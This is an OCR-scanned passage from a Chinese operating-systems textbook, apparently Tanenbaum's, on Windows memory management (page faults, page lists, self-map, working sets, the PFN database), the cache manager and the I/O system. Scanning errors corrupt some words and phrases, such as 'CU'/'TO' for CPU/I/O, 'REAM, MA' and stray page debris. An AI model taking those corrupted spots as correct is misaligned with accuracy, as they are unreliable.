(soft fault) 。 如 果 需 要 从 磁盘 进行 复制 ， 则 称 为 硬 异 常 (hard fault) 。 软 异常 同 硬 异 常 相 比 开销 更 小 ， 对 
于 应 用 程序 性 能 的 影响 很 小 。 软 异常 出 现在 下 面 场景 中 : 一 个 共享 的 页 已 经 映射 到 另 一 个 进程 ， 请 求 一 
个 新 的 全 零 页 ， 或 所 需 页 面 已 经 从 进程 的 工作 集 移 除 ， 但 是 还 没有 重用 。 压 缩 页 面 以 有 效 增 加 物理 内 存 
的 大 小 时 ， 软 异常 也 可 能 发 生 。 对 于 目前 大 多 数 系统 的 CU、 内存 和 IO 配置 ， 用 压缩 更 加 有 效 ， 而 不 
是 触发 TO， 因 为 从 消耗 (性能) 上 来 说 后 者 需要 从 磁盘 读 取 一 个 页 面 。 

当 一 个 物理 页 面 不 再 映射 到 任何 进程 的 页 表 ， 将 进入 以 下 三 种 状态 之 一 : 空闲 、 已 修改 或 后 备 。 内 
存 管理 器 会 立刻 释放 那些 类 似 已 结束 进程 的 栈 页 面 这 样 不 再 会 使 用 的 页 面 。 根 据 判 断 映射 页 面 的 页 表 项 
中 的 上 次 从 磁盘 读 出 后 的 脏 位 是 否 设 置 ， 页 面 可 能 会 再 次 发 生 异 常 ， 从 而 进入 已 修改 链表 或 者 后 备 链表 
(standby list)。 已 修改 链表 中 的 页 面 最 终 会 写 回 磁盘 ， 然 后 移 到 后 备 链表 中 。 

内 存 管理 器 可 以 根据 需要 从 空 闪 链表 或 者 后 备 链表 中 分 配 页 面 。 它 在 分 配 页 面 并 从 磁盘 复制 之 前 ， 
总 是 在 已 修改 链表 和 后 备 链表 中 检查 该 页 面 是 否 已 经 在 内 存 中 。Windows Vista 中 的 预约 式 调 页 机 制 通过 
读 入 那些 未 来 可 能 会 用 到 的 页 面 并 把 它们 插入 后 备 链表 的 方式 将 硬 异 常 转化 为 软 异 常 。 内 存 管理 器 通过 
读 入 成 组 的 连续 页 面 而 不 是 仅仅 一 个 页 面 来 进行 一 定数 量 的 普通 预约 式 调 页 。 多 余 调 入 的 页 面 立刻 插入 
后 备 链表 。 而 由 于 内 存 管 理 器 的 开销 主要 是 进行 IO 操作 引起 的 ， 因 而 预约 式 调 页 并 不 会 带 来 很 大 的 浪 
费 。 与 读 入 一 乱 页 面相 比 ， 仅 读 入 一 个 页 面 的 额外 开销 是 可 以 忽略 的 。 

图 11-31 中 的 页 表 项 指 的 是 物理 页 号 ， 而 不 是 虚拟 页 号 。 为 了 更 新 页 表 (以 及 页 目录 ) 项 ， 内 核 需 
要 使 用 虚拟 地 址 。Windows 使 用 如 图 11-32 所 示 的 页 目录 表 项 中 的 自 映射 (self-map) 表 项 将 当前 进程 的 
页 表 和 页 目录 映射 到 内 核 虚 拟 地 址 空间 。 通 过 映射 页 目录 项 到 页 目录 ( 自 映射 )， 就 有 具有 了 能 用 来 指向 
页 目录 项 (图 11-32a) 和 页 表 项 (图 11-32b) 的 虚拟 地 址 。 每 个 进程 的 自 映射 占用 同样 的 8MB 内 核 地 址 
空间 (x86 上 )。 为 了 简化 ， 图 11-32 中 只 显示 了 x86 上 的 32 位 页 表 项 自 映射 。Windows 实 际 上 使 用 的 是 64 
位 的 页 表 项 ， 这 样 系统 能 够 利用 超过 4GB 大 小 的 物理 内 存 。 对 于 32 位 的 页 表 项 ， 自 映射 在 页 目录 中 只 用 
了 一 个 页 目录 项 ， 所 以 只 占用 了 4MB 的 地 址 空间 ， 而 不 是 8MB 。 

2. 页 面 置换 算法 

当空 闲 物理 页 面 数量 降 得 较 低 时 ， 内 存 管理 器 开始 从 内 核 态 的 系统 进程 以 及 用 户 态 进程 移 走 页 面 。 
目标 就 是 使 得 最 重要 的 虚拟 页 面 在 内 存 中 ， 而 其 他 的 在 磁盘 上 。 决 定 什么 是 重要 的 需要 技巧 。Windows 
通过 大 量 使 用 工作 集 来 解决 这 一 问题 。 工 作 集 处 在 内 存 中 ， 不 需要 通过 页 面 失效 即 可 使 用 的 映射 和 内存 
的 页 面 。 当 然 ， 工 作 集 的 大 小 和 构成 随 着 从 属于 进程 的 线程 运行 来 回 变动 。 
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a) b) 
自 映 射 :PD[0xc0300000>>22] is PD (page-directory) 
虚拟 地 址 (a):(PTE *)(0xc0300c00) points to PD[0x300] which is the self-map page directory entry 


虚拟 地 址 (b):(PTE *)(0xc0390c84) points to PTE for virtual address 0xe4321000 
图 11-32 x86 上 ，Windows 用 来 映射 页 表 和 页 目录 的 物理 页 面 到 内 核 虚拟 地 址 的 自 映射 表 项 





每 个 进程 的 工作 集 由 两 个 参数 描述 ,最 小 值 和 最 大 值 。 这 两 个 参数 并 不 是 硬性 边界 ， 因 而 一 个 进程 
在 内 存 中 可 能 具有 比 它 的 工作 集 最 小 值 还 小 的 页 面 数 量 (在 特定 的 环境 下 ) ， 或 者 比 它 的 工作 集 最 大 值 
还 大 得 多 的 页 面 数量 。 每 个 进程 初始 具有 同样 的 最 大 值 和 最 小 值 的 工作 集 ， 但 这 些 边界 随 着 时 间 的 推移 
是 可 以 改变 的 ， 或 是 由 包含 在 作业 中 的 进程 的 作业 对 象 决 定 。 根 据 系统 中 的 全 部 物理 内 存 大 小 ， 这 个 默 
认 的 初始 最 小 值 的 范围 是 20~ 50 个 页 面 ， 而 最 大 值 的 范围 是 45 一 345 个 页 面 。 系 统管 理 员 可 以 改变 这 些 
默认 值 。 尽 管 一 般 的 家 庭 用 户 很 少 去 设置 ， 但 是 服务 器 端 程序 可 能 需要 设置 。 

只 有 当 系 统 中 的 可 用 物理 内 存 降 得 很 低 的 时 候 工 作 集 才 会 起 作用 。 其 他 情况 下 允许 进程 任意 使 用 它 
们 选择 的 内 存 ， 通 常 远 远 超 出 工作 集 最 大 值 。 但 是 当 系 统 面 临 内 存 压力 的 时 候 ， 内 存 管 理 器 开始 将 超出 
工作 集 上 限 最 大 的 进程 使 用 的 内 存 压 回 到 它们 的 工作 集 范 围 内 。 工 作 集 管理 器 具有 三 级 基于 定时 器 的 周 
期 活动 。 新 的 活动 会 加 入 到 相应 的 级 别 。 

1) 大 量 的 可 用 内 存 : 扫描 页 面 , 复位 页 面 的 访问 位 , 并 使 用 访问 位 的 值 来 表示 每 个 页 面 的 新 旧 程 度 。 
在 每 个 工作 集 内 保留 使 用 一 个 估算 数量 的 未 使 用 页 面 。 

2) 内 存 开始 紧缺 : 对 每 个 具有 一 定 比例 未 用 页 面 的 进程 ， 停 止 为 工作 集 增 加 页 面 ， 同 时 在 需要 增加 
一 个 新 的 页 面 的 时 候 换 出 最 旧 的 页 面 。 换 出 的 页 面 进入 后 备 或 者 已 修改 链表 。 

3) 内 存 紧缺 :消减 (也 即 减 小 ) 工作 集 ， 通 过 移 除 最 旧 的 页 面 从 而 降低 工作 集 的 最 大 值 。 

平衡 集 管理 器 (balance set manager) 线程 调用 工作 集 管理 器 ， 使 得 其 每 秒 都 在 运行 。 工 作 集 管 理 
器 抑制 一 定数 量 的 工作 从 而 不 会 使 得 系统 过 载 。 它 同时 也 监控 要 写 回 磁盘 的 已 修改 链表 上 的 页 面 ， 通 过 
唤醒 ModifiedPageWriter 线 程 使 得 页 面 数 量 不 会 增长 得 过 快 。 

3. 物理 内 存 管理 

上 面 提 到 了 物理 页 面 的 三 种 不 同 链表 ， 空 闲 链表 、 后 备 链表 和 已 修改 链表 。 除 此 以 外 还 有 第 四 种 链 
表 ， 即 全 部 被 填 零 的 空 闪 页面。 系统 会 频繁 地 请 求全 零 的 页 面 。 当 为 进程 提供 新 的 页 面 ， 或 者 读 取 一 个 
文件 的 最 后 部 分 不 足 一 个 页 面 时 ， 需 要 全 零 页 面 。 将 一 个 页 面 写 为 全 零 是 需要 时 间 的 ， 因 此 在 后 台 使 用 
低 优 先 级 的 线程 创建 全 零 页 是 一 个 较 好 的 方式 。 另 外 还 有 第 五 种 链表 存放 有 硬件 错误 的 页 面 ( 即 通过 硬 
件 错误 检测 ) 。 

系统 中 的 所 有 页 面 要 么 由 一 个 有 效 的 页 表 项 索引 ， 要 么 属于 以 上 五 种 链表 中 的 一 种 ， 它 们 的 全 体 称 
为 页 框 号 数据 库 (PFN 数 据 库 )。 图 11-33 表 明 PFN 数 据 库 的 结构 。 该 表格 由 物理 页 框 号 索引 。 表 项 都 是 
固定 长 度 的 ， 但 是 不 同类 型 的 表 项 使 用 不 同 的 格式 (例如 共享 页 面相 对 于 私有 页 面 )。 有 效 的 表 项 维护 
页 面 的 状态 以 及 指向 该 页 面 数量 的 计数 。 工 作 集 中 的 页 面 指出 哪个 表 项 索引 它们 。 还 有 一 个 指向 该 页 的 
进程 页 表 的 指针 ( 非 共 享 页 ) ， 或 者 指向 原型 页 表 的 指针 (共享 页 ) 。 
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图 11-33 一 个 有 效 的 页 面 在 页 框 数据 库 上 的 一 些 主 要 域 


此 外 还 有 一 个 指向 链表 中 下 一 个 页 面 的 指针 (如果 有 的 话 )， 以 及 若干 诸如 正在 进行 读 和 写 的 域 以 
及 标志 位 等 。 这 些 链表 链接 在 一 起 ， 并 且 通 过 下 标 指 向 下 一 个 单元 ， 不 使 用 指针 ， 从 而 达到 节省 存储 空 
间 的 目的 。 另 外 用 物理 页 面 的 表 项 汇总 在 若干 指向 物理 页 面 的 页 表 项 中 找到 的 脏 位 〈 即 由 于 共享 页 面 ) 。 
表 项 还 有 一 些 别 的 信息 用 来 表示 内 存 页 面 的 不 同 ， 以 便 访 问 那 些 内 存 速 度 更 快 的 大 型 服务 器 系统 上 ( 即 
NUMA- 非 均衡 存储 器 访问 的 机 器 ) 。 
工作 集 管理 器 和 其 他 的 系统 线程 控制 页 面 在 工作 集 和 不 同 的 链表 间 移 动 。 下 面 对 这 些 转变 进行 研究 。 
当 工 作 集 管理 器 将 一 个 页 面 从 某 个 工作 集中 去 掉 ， 则 该 页 面 按照 自身 是 否 修改 的 状态 进入 后 备 或 已 修改 
链表 的 底部 。 这 一 转变 在 图 11-34 的 (1) 中 进行 了 说 明 。 
两 个 链表 中 的 页 面 仍然 是 有 效 的 页 面 ， 当 页 面 失效 发 生 的 时 候 需 要 它们 中 的 一 个 页 ， 则 将 该 页 移 
回 工作 集 而 不 需要 进行 磁盘 IO 操作 (2)。 当 一 个 进程 人 退出， 该 进程 的 非 共 享 页 面 不 能 通过 异常 机 制 回 
到 以 前 的 工作 集 ， 因 此 该 进程 页 表 中 的 有 效 页 面 以 及 挂 起 和 已 修改 链表 中 的 页 面 都 移入 空闲 链表 (3)。 
任何 该 进程 的 页 面 文件 也 得 到 释放 。 
其 他 的 系统 调用 会 引起 别 的 转变 。 平 衡 集 管理 器 线程 每 4 秒 运行 一 次 来 查找 那些 所 有 的 线程 都 进入 
空闲 状态 超过 一 定 秒 数 的 进程 。 如 果 发 现 这 样 的 进程 ， 就 从 物理 内 存 去 掉 它 们 的 内 核 栈 ， 这 样 的 进程 的 
页 面 也 如 (1) 一 样 移动 到 后 备 链表 或 已 修改 链表 。 
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图 11-34 不 同 的 页 面 链表 以 及 它们 之 间 的 转变 


两 个 系统 线程 一 一 映射 页 面 写 入 器 (mapped page writer) 和 已 修改 页 面 写 入 器 (modified page 
writer), ， 周 期 性 地 被 唤醒 来 检查 是 否 系统 中 有 足够 的 干净 页 面 。 如 果 没 有 ， 这 两 个 线程 从 已 修改 链表 的 
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顶部 取出 页 面 ， 写 回 到 磁盘 ， 然 后 将 这 些 页 面 插入 后 备 链表 (4)。 前 者 处 理 对 于 映射 文件 的 写 ， 而 后 者 
处 理 页 面 文件 的 写 。 这 些 写 的 结果 就 是 将 已 修改 (WE) 页 面 移 到 后 备 (TH) 链表 中 。 

之 所 以 使 用 两 个 线程 是 因为 映射 文件 可 能 会 因为 写 的 结果 增长 ， 而 增长 的 结果 就 需要 对 磁盘 上 的 数 
据 结构 具有 相应 的 权限 来 分 配 空闲 磁盘 块 。 当 一 个 页 面 被 写 人 时 如 果 没 有 足够 的 内 存 ， 就 会 导致 死 锁 。 
另 一 个 线程 则 是 解决 向 页 面 文件 写 人 页 时 的 问题 。 

下 面 说 明 图 11-34 中 另 一 个 转换 。 如 果 进 程 解除 页 映射 , 该 页 不 再 和 进程 相关 从 而 进入 空闲 链表 (5)， 
当 该 页 是 共享 的 时 候 例 外 。 当 页 面 失效 会 请 求 一 个 页 框 给 将 要 读 入 的 页 ， 此 时 该 页 框 会 尽 可 能 从 空闲 链 
表 中 取 下 (6)。 由 于 该 页 会 被 全 部 重 写 ， 因 此 即使 有 机 密 的 信息 也 没有 关系 。 

栈 的 增长 则 是 另 一 种 情况 。 这 种 情况 下 ， 需 要 一 个 空 的 页 框 ， 同 时 安全 规则 要 求 该 页 全 零 。 由 于 这 
个 原因 ， 另 一 个 称 为 零 页 面 线程 (ZeroPage thread) 的 低 优 先 级 内 核 线程 (参见 图 11-26) 将 空闲 链表 中 
的 页 面 写 全 零 并 将 页 面 放 入 全 零 页 链表 (7) 。 全 和 零 页 面 很 可 能 比 空闲 页 面 更 加 有 用 ， 因 此 只 要 当 CPU 空 
闲 且 有 空闲 页 面 ， 零 页 面 线程 就 会 将 这 些 页 面 全 部 写 零 ， 而 在 CPU 空闲 的 时 候 进行 这 一 操作 也 是 不 增加 
开销 的 。 : 

所 有 这 些 链 表 的 存在 导致 了 一 些微 妙 的 策略 抉择 。 例 如 ， 假 设 要 从 磁盘 载 入 一 个 页 面 ， 但 是 空 闪 链 
REAM, MA, 要么 从 后 备 链表 中 取出 一 个 干净 页 (虽然 这 样 做 稍 后 有 可 能 导致 缺 页 )， 要 么 从 全 零 
页 面 链表 中 取出 一 个 空 页 (忽略 把 该 页 清 零 的 代价 ) ， 系 统 必 须 在 上 述 两 种 策略 之 间 做 出 选择 。 哪 一 个 
更 好 呢 ? 

内 存 管理 器 必须 决定 系统 线程 把 页 面 从 已 修改 链表 移动 到 后 备 链表 的 积极 程度 。 有 干净 的 页 面 后 备 
总 比 有 脏 页 后 备 好 得 多 (因为 如 有 需要 ,干净 的 页 可 以 立即 重用 )， 但 是 一 个 积极 的 净化 策略 意味 着 更 
多 的 磁盘 IO， 同 时 一 个 刚刚 净化 的 页 面 可 能 由 于 缺 页 中 断 重 新 回 到 工作 集中 ， 然 后 又 成 为 脏 页 。 通 党 
来 讲 ，Windows 通 过 算法 、 启 发 、 猜 测 、 历 史 、 经 验 以 及 管理 员 可 控 参 数 的 配置 来 做 权衡 。 

现代 Windows 在 内 存 管理 器 底部 引入 了 一 个 额外 的 抽象 层 ， 称 为 存储 管理 器 。 这 一 层 决 定 了 如 何 优 
化 可 用 的 支持 存储 的 IO 操作 。 持 久 存储 系统 包括 辅助 闪存 和 SSD， 再 加 上 旋转 的 磁盘 。 存 储 管理 器 对 持 
久 存储 所 支持 的 物理 内 存 的 存储 位 置 和 方式 进行 优化 ， 它 也 执行 最 优化 的 技术 ， 比 如 共享 相同 物理 页 面 
时 和 在 就 绪 队 列 中 压缩 页 面 时 的 写 时 复制 ， 从 而 有 效 增加 RAM 的 可 用 性 。 

现代 Windows 在 内 存 管 理 方面 的 另外 一 个 改变 就 是 交换 文件 的 引入 。Windows 中 传统 的 内 存 管理 方 
式 是 基于 工作 集 的 ， 正 如 上 面 所 提 到 的 。 当 内 存 使 用 压力 增加 时 ， 内 存 管理 器 会 对 工作 集 进行 压缩 ， 以 
减少 每 个 进程 在 内 存 中 的 踪迹 。 现 代 应 用 程序 模型 有 机 会 引入 新 的 效率 模型 。 一 旦 用 户 切 换 出 去 ， 那 么 
包含 新 型 应 用 程序 的 前 台 部 分 的 进程 将 不 再 被 分 配 处 理 器 资源 ， 它 的 页 面 也 没有 必要 留 在 内 存 中 。 正 如 
在 系统 中 遇 到 的 内 存 压力 那样 ， 进 程 中 的 页 面 也 可 能 作为 正常 的 工作 集 管理 器 的 一 部 分 而 被 移出 内 存 。 
然而 ， 进 程 的 生存 管理 器 知道 它 被 用 户 切换 到 应 用 程序 的 前 台 进 程 用 了 多 久 。 当 需要 更 多 内 存 空 间 时 ， 
系统 会 挑 出 一 个 很 久 没 有 执行 的 进程 ， 然 后 将 其 调用 到 内 存 管 理 器 ， 并 通过 少量 的 IO 操作 有 效 交 换 它 
的 所 有 页 面 。 这 些 页 面 将 会 被 写 人 交换 文件 ， 汇 总 到 一 个 或 者 多 个 块 中 。 这 就 意味 着 整个 进程 也 能 通过 
很 少 的 IO 操作 存 到 内 存 中 。 

总 而 言 之 ， 内 存 管理 需要 一 个 拥有 多 种 数据 结构 、 算 法 和 启发 性 的 十 分 复杂 、 重 要 的 组 件 。 它 尽 可 
能 地 自我 调整 ， 但 是 仍然 留 有 很 多 选项 使 系统 管理 员 可 以 通过 配置 这 些 选项 来 影响 系统 性 能 。 大 部 分 的 
选项 和 计数 器 可 以 通过 工具 浏览 ， 相 关 的 各 种 工具 包 在 前 面 都 有 提 到 。 也 许 在 这 里 最 值得 记 住 的 就 是 ， 
在 真实 的 系统 里 ， 内 存 管理 不 仅仅 是 一 个 简单 的 时 钟 或 老化 的 页 面 算法 。 


11.6 Windows 的 高 速 缓 存 


Windows 高 速 缓 存 (cache) 通过 把 最 近 和 经 常 使 用 的 文件 片段 保存 在 内 存 中 的 方式 来 提升 文件 系统 的 
性 能 。 高 速 缓存 管理 器 管理 的 是 虚拟 寻 址 的 数据 块 ， 也 就 是 文件 片段 ， 而 不 是 物理 寻 址 的 磁盘 块 。 这 种 方 
法 非常 适合 NTFS 文 件 系 统 ， 如 11.8 节 所 示 。NTFS 把 所 有 的 数据 作为 文件 来 存储 ， 包 括 文件 系统 的 元 数据 。 

高 速 缓存 的 文件 片段 称 为 视图 (view)， 这 是 因为 它们 代表 了 被 映射 到 文件 系统 的 文件 上 的 内 核 虚 拟 地 
址 片段 。 所 以 ， 在 高 速 缓存 中 ， 对 物理 内 存 的 管理 实际 上 是 由 内 存 管理 器 提供 的 。 高 速 缓存 管理 器 的 作用 
是 为 视图 管理 内 核 虚 拟 地 址 的 使 用 ， 命 令 内 存 管理 器 在 物理 内 存 中 钉 住 页 面 ， 以 及 为 文件 系统 提供 接口 。 
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Windows 高 速 缓存 管理 器 工具 在 文件 系统 中 被 广泛 地 共享 。 这 是 因为 高 速 缓存 是 根据 独立 的 文件 来 虚 
拟 寻 址 的 ， 高 速 缓存 管理 器 可 以 在 每 个 文件 的 基础 上 很 轻易 地 实现 预 读 取 。 访 问 高 速 缓存 数据 的 请 求 来 自 
于 每 个 文件 系统 。 由 于 文件 系统 不 需要 先 把 文件 的 偏 移 转换 成 物理 磁盘 号 然后 再 请 求 读 取 高 速 缓存 的 文 
件 页 ， 所 以 虚拟 缓存 非常 方便 。 类 似 的 转换 发 生 在 内 存 管理 器 调用 文件 系统 访问 存储 在 磁盘 上 的 页 面 的 
时 候 。 

除了 对 内 核 虚拟 地 址 和 用 来 缓存 的 物理 内 存 资源 的 管理 外 ， 考 虑 到 视图 的 一 致 性 ， 大 批量 磁盘 回 写 ， 
以 及 文件 结束 标志 的 正确 维护 (特别 是 当 文件 扩展 的 时 候 ) ， 高 速 缓存 管理 器 还 必须 与 文件 系统 协作 。 在 
文件 系统 、 高 速 缓存 管理 器 和 内 存 管理 器 之 间 管 理 文件 最 困难 的 方面 在 于 文件 中 最 后 一 个 字 节 的 偏 移 ， 即 
有 效 数据 长 度 。 如 果 一 个 程序 写 出 了 文件 未 尾 ， 则 越过 的 磁盘 块 都 需要 清 零 ， 同 时 为 了 安全 的 原因 ， 在 文 
件 的 元 数据 中 记录 的 有 效 数 据 长 度 不 应 该 允许 访问 未 经 初始 化 的 磁盘 块 ， 所 以 全 零 磁 盘 块 在 文件 元 数据 更 
新 为 新 的 长 度 之 前 必须 写 回 到 磁盘 上 。 然 而 ， 可 以 预见 的 是 ， 如 果 系 统 崩 涡 ， 一 些 文件 的 数据 块 可 能 还 没 
有 按照 内 存 中 的 数据 进行 更 新 ， 还 有 一 些 数据 块 可 能 含有 属于 其 他 文件 的 数据 ， 这 都 是 不 能 接受 的 。 

现在 让 我 们 来 看 看 高 速 缓存 管理 器 是 如 何 工 作 的 。 当 一 个 文件 被 引用 时 ， 高 速 缓 存 管理 器 映射 一 块 
大 小 为 256KB 的 内 核 虚拟 地 址 空间 给 文件 。 如 果 文 件 大 于 256KB， 那 么 每 次 只 有 一 部 分 文件 被 映射 进来 。 
如 果 高 速 缓 存 管理 器 耗 尽 了 虚拟 地 址 空间 中 大 小 为 256KB 的 块 ， 那 么 ， 它 在 映射 一 个 新 文件 之 前 必须 释 
放 一 个 旧 的 文件 。 文 件 一 旦 被 映射 ， 高 速 缓存 管理 器 通过 把 内 核 虚 拟 地 址 空间 复制 到 用 户 缓冲 区 的 方式 
来 满足 对 该 数据 块 的 请 求 。 如 果 要 复制 的 数据 块 不 在 物理 内 存 当 中 ， 会 发 生 缺 页 中 断 ， 内 存 管理 器 会 按 
照 通常 的 方式 处 理 该 中 断 。 高 速 缓存 管理 器 甚至 不 知道 一 个 数据 块 是 不 是 在 内 存 当 中 。 复 制 总 是 成 功 的 。 

除了 在 内 核 和 用 户 缓冲 区 之 间 复 制 的 页 面 ， 高 速 缓存 管理 器 也 为 映射 到 虚拟 内 存 的 页 面 和 依靠 指针 
访问 的 页 面 服务 。 当 一 个 线程 访问 某 一 映射 到 文件 中 的 虚拟 地 址 但 发 生 缺 页 的 时 候 ， 内 存 管 理 器 在 大 多 
数 情况 下 能 够 使 用 软 中 断 处 理 这 种 访问 。 如 果 该 页 面 已 经 被 高 速 缓存 管理 器 映射 到 内 存 当中 ， 即 该 页 面 
已 经 在 物理 内 存 当 中 ， 那 么 就 不 需要 去 访问 磁盘 了 。 


11.7 Windows 的 I/O 


Windows IO 管理 器 提供 了 灵活 的 、 可 扩展 的 基础 框架 ， 以 便 有 效 地 管理 非常 广泛 的 IO 设备 和 服务 ， 
支持 自动 的 设备 识别 和 驱动 程序 安装 ( 即 插 即 用 ) 及 用 于 设备 和 CPU 的 电源 管理 一 一 以 上 均 基 于 异步 结 
构 使 得 计算 可 以 与 1O 传 输 重合 。 大 约 有 数 以 十 万 计 的 设备 在 Windows 上 工作 。 一 大 批 常用 设备 其 至 不 需 
要 安装 驱动 程序 ， 因 为 Windows 操 作 系 统 已 附带 其 驱动 程序 。 但 即使 如 此 ， 考 虑 到 所 有 的 版 本 ， 也 有 将 
近 100 万 种 不 同 的 驱动 程序 在 Windows 上 运行 。 以 下 各 节 中 ， 我 们 将 探讨 一 些 WO 相 关 的 问题 。 


11.7.1 基本 概念 

1/O 管 理 器 与 即 插 即 用 管理 器 紧密 联系 。 即 插 即 用 背后 的 基本 思想 是 一 条 可 枚 举 总 线 。 许 多 总 线 的 
设计 ， 包 括 PC 卡 、PCI、PCIe、AGP、USB、IEEE 1394、EIDE、EIDE 和 SATA， 都 支持 即 插 即 用 管理 
器 向 每 个 插 槽 发 送 请 求 ， 并 要 求 每 个 插 模 上 的 设备 表明 身份 。 即 插 即 用 管理 器 发 现 设 备 的 存在 以 后 ， 就 
为 其 分 配 硬件 资源 ， 如 中 断 等 级 ， 找 到 适当 的 驱动 程序 ， 并 加 载 到 内 存 中 。 每 个 驱动 程序 加 载 时 ， 就 为 
其 创建 一 个 驱动 程序 对 象 (driver object) 。 每 个 设备 至 少 分 配 一 个 设备 对 象 。 对 于 一 些 总 线 ， 如 SCSI,， 
枚 举 只 发 生 在 启动 时 间 ， 但 对 于 其 他 总 线 ， 如 USB ， 枚 举 可 以 在 任何 时 间 发 生 ， 这 就 需要 即 插 即 用 管理 
器 ， 总 线 驱 动 程序 (确实 在 枚 举 的 总 线 ) ， 和 IO 管理 器 之 间 的 密切 协作 。 

在 Windows 中 ， 所 有 与 硬件 无 关 的 程序 ， 如 文件 系统 、 防 病毒 过 滤器 、 卷 管理 器 、 网 络 协 议 栈 ， 蔬 
至 内 核 服 务 ， 都 是 用 IO 驱动 程序 来 实现 的 。 系 统 配置 必须 设置 成 能 够 加 载 这 些 驱 动 程序 ， 因 为 在 总 线 
上 不 存在 可 枚 举 的 相关 设备 。 例 如 文件 系统 ， 在 需要 时 它 将 由 特殊 代码 加 载 ， 如 文件 系统 识别 器 查看 裸 
卷 以 及 辨别 文件 系统 格式 的 时 候 。 

Windows 的 一 个 有 趣 的 特点 是 支持 动态 磁盘 (dynamic disk) 。 这 些 磁盘 可 以 跨越 多 个 分 区 ， 或 多 个 
磁盘 ， 蕉 至 无 需 重新 启动 在 使 用 中 就 可 以 重新 配置 。 通 过 这 种 方式 ， 逻 辑 卷 不 再 被 限制 在 一 个 单一 的 分 
区 或 磁盘 内 ， 一 个 单一 的 文件 系统 也 可 以 透明 地 跨越 多 个 驱动 器 。 

从 IO 到 卷 可 被 一 个 特殊 的 Windows 驱 动 程序 过 滤 产 生 卷 阴影 副本 (volume shadow copy)。 过 滤 驱 
动 程序 创建 一 个 可 单独 挂 载 的 ， 并 代表 某 一 特定 时 间 点 的 卷 快照 。 为 此 ， 它 会 跟踪 快照 点 后 的 变化 。 这 
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对 恢复 被 意外 删除 的 文件 或 根据 定期 生成 的 卷 快照 查看 文件 过 去 的 状态 非常 方便 。 

阴影 副本 对 精确 备份 服务 器 系统 也 很 有 价值 。 在 该 系统 上 运行 服务 器 应 用 程序 ， 它 们 可 以 在 合适 的 
时 机 制作 一 个 干净 的 持久 备份 。 一 旦 所 有 的 应 用 程序 准备 就 绪 ， 系 统 初始 化 卷 快 照 ， 然 后 通知 应 用 程序 
继续 执行 。 备 份 由 卷 快 照 组 成 。 这 与 备份 期 间 不 得 不 脱 机 相 比 ， 应 用 程序 只 是 被 阻塞 了 很 短 的 时 间 。 

应 用 程序 参与 快照 过程 ， 因 此 一 旦 发 生 故 障 ， 备 份 反映 的 是 一 个 非常 易于 恢复 的 状态 。 否 则 ， 就 算 
备份 仍然 有 用 ， 但 抓 取 的 状态 将 更 像 是 系统 崩溃 时 的 状态 。 而 从 崩溃 点 恢复 系统 更 加 困难 ， 甚 至 是 不 可 
能 的 ， 因 为 崩溃 可 能 在 应 用 程序 执行 过 程 的 任意 时 刻 发 生 。 墨 菲 定律 说 ， 故 障 最 有 可 能 在 最 坏 的 时 候 发 
生 ， 也 就 是 说 ， 故 障 可 能 在 应 用 程序 的 数据 正 处 于 不 可 恢复 的 状态 时 发 生 。 

另 一 方面 ，Windows 支 持 异 步 JO。 一 个 线程 启动 一 个 IO 操作 ， 然 后 与 该 MO 操作 并 行 执行 。 这 项 功 
能 对 服务 器 来 说 特别 重要 。 有 各 种 不 同 的 方法 使 线程 可 以 发 现 该 1O 操 作 是 否 已 经 完成 。 一 是 启动 VO 操 
作 的 同时 指定 一 个 事件 对 象 ， 然 后 等 待 它 结 束 。 另 一 种 方法 是 指定 一 个 队列 ， 当 IO 操作 完成 时 ， 系 统 
将 一 个 完成 事件 插入 到 队列 中 。 三 是 提供 一 个 回调 函数 ，IO 操 作 完 成 时 供 系 统 调用 。 四 是 在 内 存 中 开 
和 辟 一 块 区 域 ， 当 IO 操作 完成 时 由 IO 管理 器 更 新 该 区 域 。 

我 们 要 讨论 的 最 后 一 个 方面 是 IO 优先 级 。LO 优 先 级 是 由 发 起 IO 操作 的 线程 来 确定 的 ， 或 者 也 可 以 
明确 指定 。 共 有 5 个 优先 级 别 ， 分 别 是 : 关键 、 高 、 正 常 、 低 、 非 常 低 。 关 键 级 别 为 内 存 管理 器 预 留 ， 
以 避免 系统 经 历 极端 内 存 压力 时 出 现 死 锁 现象 。 低 和 非常 低 的 优先 级 为 后 台 进 程 所 使 用 ， 例 如 磁盘 碎片 
整理 服务 、 间 谍 软件 扫描 器 和 桌面 搜索 ， 以 免 干 扰 正 常 操作 。 大 部 分 1/O 操 作 的 优先 级 是 正常 级 别 ， 但 
是 为 避免 小 故障 ， 多 媒体 应 用 程序 也 可 标记 它们 的 IO 优先 级 为 高 。 多 媒体 应 用 可 有 选择 地 使 用 带宽 预 
留 模式 获得 带宽 保证 以 访问 时 间 敏 感 的 文件 ， 如 音乐 或 视频 。LO 系 统 将 给 应 用 程序 提供 最 优 的 传输 大 
小 和 显 式 IO 操 作 的 数目 ， 从 而 维持 应 用 程序 向 IO 系统 请 求 的 带宽 保证 。 

11.7.2 VO 的 API 调 用 

由 IO 管理 器 提供 的 API 与 大 多 数 操作 系统 提供 的 API 并 没有 很 大 的 不 同 。 基 本 操作 有 open、read、 
write、ioctl 和 close， 以 及 即 插 即 用 和 电源 操作 、 参 数 设 置 、 刷 新 系统 缓冲 区 等 。 在 Win32 层 ， 这 些 API 被 包 
装 成 接口 ， 向 特定 的 设备 提供 了 更 高 一 级 的 操作 。 在 底层 ,这 些 API 打 开设 备 ， 并 执行 这 些 基 本 类 型 的 操作 。 
即使 是 对 一 些 元 数据 的 操作 ， 如 重 命名 文件 ， 也 没有 用 专门 的 系统 调用 来 实现 。 它 们 只 是 特殊 的 ioctl 操 作 。 
在 我 们 解释 了 IO 设备 栈 和 IO 管理 器 使 用 的 IO 请 求 包 (IRP) 之 后 ， 读 者 将 对 上 面 的 陈述 更 有 体会 。 

保持 了 Windows 一 贯 的 通用 哲学 ， 原 生 NT IO 系统 调用 带 有 很 多 参数 并 包括 很 多 变种 。 图 11-35 列 
出 了 IO 管理 器 中 主要 的 系统 调用 接口 。NtCreateFile 用 于 打开 已 经 存在 的 或 者 新 的 文件 。 它 为 新 创建 














图 11-35 执行 JO 的 原生 NT API 调用 


536 i Zus 


的 文件 提供 了 安全 描述 符 和 一 个 对 被 请 求 的 访问 权限 的 详细 描述 ， 并 使 得 新 文件 的 创建 者 拥有 了 一 些 如 
何 分 配 磁盘 块 的 控制 权 。NtReadFile 和 NtWriteFile 需 要 文件 句柄 、 缓 冲 区 和 长 度 等 参数 。 它 们 也 需要 一 
